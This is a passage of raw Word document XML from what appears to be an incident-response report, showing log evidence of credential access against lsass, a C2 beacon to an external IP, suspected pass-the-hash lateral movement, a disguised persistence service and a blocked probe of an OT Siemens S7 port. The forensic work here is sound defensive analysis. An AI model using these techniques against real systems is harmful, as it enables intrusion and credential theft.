            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SourceImage    : C:\Users\jthomas\AppData\Roaming\svcupd.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">TargetImage    : C:\Windows\System32\lsass.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">GrantedAccess  : 0x1410  (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CallTrace      : C:\Windows\SYSTEM32\ntdll.dll+...|C:\Windows\System32\KERNELBASE.dll+...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- Event ID 3: Network Connection (C2 beacon) ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">EventRecordID  : 1183602</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">UtcTime        : 2026-03-18 02:18:07.883</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Image          : C:\Users\jthomas\AppData\Roaming\svcupd.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">DestinationIp  : 185.234.219.47</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">DestinationPort: 443</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol       : tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Initiated      : true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 Log Evidence — Active Directory: Lateral Movement via Service Account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following Active Directory Security Event logs captured from DC-COV-01 document the unauthorized use of the compromised SVC-CAD-SYNC01 service account credentials to authenticate laterally to JLR-ENG-WS-012:</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050D1A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">=== ACTIVE DIRECTORY SECURITY EVENT LOG — DC-COV-01 ========</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Domain Controller: DC-COV-01.jlr.local</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log: Security  |  Source: Microsoft-Windows-Security-Auditing</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- Event ID 4624: Account Logon (SUSPICIOUS — service account, off-hours) ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">EventRecordID  : 8841204</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">TimeCreated    : 2026-03-18T02:28:47.881Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Security ID    : JLR\SVC-CAD-SYNC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Account Name   : SVC-CAD-SYNC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFA07A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Logon Type     : 3  (Network — SMB/CIFS)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Source Workstation: JLR-ENG-WS-047  (10.20.1.12)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Destination    : JLR-ENG-WS-012  (10.20.1.47)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authentication : NTLM (Pass-the-Hash suspected — Kerberos not used)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Failure Code   : 0x0  (SUCCESS)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Workstation    : JLR-ENG-WS-047</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ANOMALY        : SVC-CAD-SYNC01 normal logon hours 06:00-20:00; this is 02:28 UTC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- Event ID 4648: Logon using explicit credentials ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">EventRecordID  : 8841211</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">TimeCreated    : 2026-03-18T02:28:47.901Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Subject Account: JLR\jthomas  (the human account — credential relay)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Account : JLR\SVC-CAD-SYNC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Server  : JLR-ENG-WS-012</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Address: 10.20.1.12 (JLR-ENG-WS-047)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- Event ID 7045: New Service Installed (persistence attempt) ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">EventRecordID  : 8841298</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">TimeCreated    : 2026-03-18T02:29:14.443Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Computer       : JLR-ENG-WS-012.jlr.local</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Service Name   : WindowsUpdateHelper</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Service File   : C:\Windows\Temp\wuhelper.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Service Type   : User Mode Service  |  Start Type: Auto Start</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Account        : JLR\SVC-CAD-SYNC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ANOMALY        : Service installed by service account — not IT Ops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 Log Evidence — Palo Alto NGFW: OT Boundary Probe Blocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following firewall deny log confirms that the attacker's probe of the VLAN 30 OT/Manufacturing boundary was blocked by the inter-VLAN firewall policy. This is the most critical containment log, confirming the OT segment was not breached.</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050D1A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">=== PALO ALTO NGFW TRAFFIC LOG — FW-COV-CORE-01 ===========</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Device         : FW-COV-CORE-01 (Palo Alto PA-5260 — Coventry HQ)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log Type       : Traffic — DENY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule           : DENY-VLAN20-TO-OT-VLAN30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">--- OT Boundary Probe Attempt #1 ---</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamp      : 2026-03-18T02:40:51.003Z</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Source IP      : 10.20.1.47  (JLR-ENG-WS-012 — VLAN 20 R&amp;D)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Source Port    : 51847</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest IP        : 10.30.0.1   (Siemens MES Gateway — VLAN 30 OT)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dest Port      : 102         (S7 Communication — Siemens S7 PLC protocol)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
